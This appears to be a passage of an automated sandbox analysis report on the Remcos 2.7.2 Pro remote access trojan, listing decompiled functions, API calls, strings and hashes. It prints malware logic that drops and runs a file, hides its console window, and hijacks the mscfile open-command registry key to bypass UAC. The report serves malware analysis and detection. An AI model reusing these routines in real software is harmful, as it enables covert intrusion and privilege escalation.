                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                          • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                          • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                          • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                          • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                          • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                          • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                          • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                          • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                          • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                          • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                          • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                          • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                          • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                          • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                          • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                        • String ID:
                                        • API String ID: 3444260106-0
                                        • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                        • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                        • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                        • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413D3D, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 90memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 63%
                                        			E00413D3D(signed int __edx, intOrPtr _a4) {
				void _v1003;
				char _v1004;
				struct HWND__* _t13;
				signed int _t34;
				signed int _t36;
				unsigned int _t40;
				signed int _t41;
				signed int _t47;
				signed int _t50;
				signed int _t56;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				void* _t91;
				void* _t92;
				void* _t93;

				_t64 = __edx;
				AllocConsole();
				_t13 =  *0x41c1f8();
				 *0x41c1fc = _t13;
				if(_a4 == 0) {
					ShowWindow(_t13, 0);
				}
				freopen("CONOUT$", "a", __imp___iob + 0x20);
				_v1004 = 0;
				memset( &_v1003, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_t65 = _t64 | 0xffffffff;
				asm("repne scasb");
				_t40 =  !_t65;
				_t91 = " * Remcos v" - _t40;
				_t41 = _t40 >> 2;
				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
				asm("repne scasb");
				_t47 =  !_t65;
				_t92 = "2.7.2 Pro" - _t47;
				_t34 = _t47;
				asm("repne scasb");
				_t50 = _t34 >> 2;
				memcpy( &_v1004 - 1, _t92, _t50 << 2);
				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
				asm("repne scasb");
				_t56 =  !_t65;
				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
				_t36 = _t56;
				asm("repne scasb");
				_t59 = _t36 >> 2;
				memcpy( &_v1004 - 1, _t93, _t59 << 2);
				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
				return printf( &_v1004);
			}



















                                        0x00413d3d
                                        0x00413d49
                                        0x00413d4f
                                        0x00413d57
                                        0x00413d5f
                                        0x00413d63
                                        0x00413d63
                                        0x00413d7c
                                        0x00413d8f
                                        0x00413d95
                                        0x00413d97
                                        0x00413d99
                                        0x00413d9a
                                        0x00413da6
                                        0x00413da8
                                        0x00413db4
                                        0x00413dbe
                                        0x00413dca
                                        0x00413dd3
                                        0x00413dd5
                                        0x00413dd9
                                        0x00413ddd
                                        0x00413de1
                                        0x00413de6
                                        0x00413de9
                                        0x00413df6
                                        0x00413dff
                                        0x00413e01
                                        0x00413e05
                                        0x00413e09
                                        0x00413e0d
                                        0x00413e12
                                        0x00413e15
                                        0x00413e23
                                        0x00413e32

                                        APIs
                                        • AllocConsole.KERNEL32(73B743E0,0041BCB0,00000000), ref: 00413D49
                                        • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                        • freopen.MSVCRT ref: 00413D7C
                                        • printf.MSVCRT ref: 00413E25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocConsoleShowWindowfreopenprintf
                                        • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                        • API String ID: 3419900118-1124569734
                                        • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                        • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                        • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                        • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E254, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 20%
                                        			E0040E254(void* __eax, void* __eflags) {
				void* _t7;
				void* _t9;
				void* _t28;

				_t33 = __eflags;
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
				E004017DD(_t28 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}






                                        0x0040e254
                                        0x0040e25d
                                        0x0040e266
                                        0x0040e273
                                        0x0040e27a
                                        0x0040e286
                                        0x0040e28d
                                        0x0040e29e
                                        0x0040e2aa
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                          • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                        • String ID: name
                                        • API String ID: 4248281052-1579384326
                                        • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                        • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                        • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                        • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411AF5, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 34sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E00411AF5(void* __ecx, WCHAR* _a4) {
				char _v5;
				char _v6;
				void* _t13;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}






                                        0x00411b08
                                        0x00411b1c
                                        0x00411b22
                                        0x00411b41
                                        0x00411b48
                                        0x00411b58

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                        • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                        • Sleep.KERNEL32(00002710), ref: 00411B48
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                        • String ID: Alarm has been triggered!$[ALARM]
                                        • API String ID: 4004766653-1190268461
                                        • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                        • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                        • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                        • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D8FF, Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0040D8FF() {
				void* _t10;
				char* _t12;
				int _t13;
				char* _t15;
				signed int _t16;
				char* _t18;
				void* _t41;
				void* _t46;
				intOrPtr _t51;

				_t51 =  *0x41bf20; // 0x0
				 *0x41c119 = 0;
				if(_t51 != 0) {
					E004020F4(_t10, 0x41bf20);
				}
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t13 = atoi(_t12);
				E0040F572();
				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t16 = atoi(_t15);
				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
				E004017DD(_t46 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}












                                        0x0040d901
                                        0x0040d907
                                        0x0040d90d
                                        0x0040d914
                                        0x0040d914
                                        0x0040d928
                                        0x0040d933
                                        0x0040d93a
                                        0x0040d947
                                        0x0040d94c
                                        0x0040d957
                                        0x0040d95e
                                        0x0040d965
                                        0x0040d973
                                        0x0040d97a
                                        0x0040d985
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                        • atoi.MSVCRT ref: 0040D947
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                        • atoi.MSVCRT ref: 0040D965
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                        • atoi.MSVCRT ref: 0040D981
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                        • String ID:
                                        • API String ID: 2234106156-0
                                        • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                        • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                        • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                        • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004031F8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                        • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                        • API String ID: 1883807236-2313358711
                                        • Opcode ID: 58e6912436aa6a0f7ff26497d16348cffd3a4bc0f52e92236de34c747d335e76
                                        • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                        • Opcode Fuzzy Hash: 58e6912436aa6a0f7ff26497d16348cffd3a4bc0f52e92236de34c747d335e76
                                        • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405CCA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E00405CCA(struct HHOOK__** __ecx) {
				char _v5;
				char _v6;
				void* _t9;
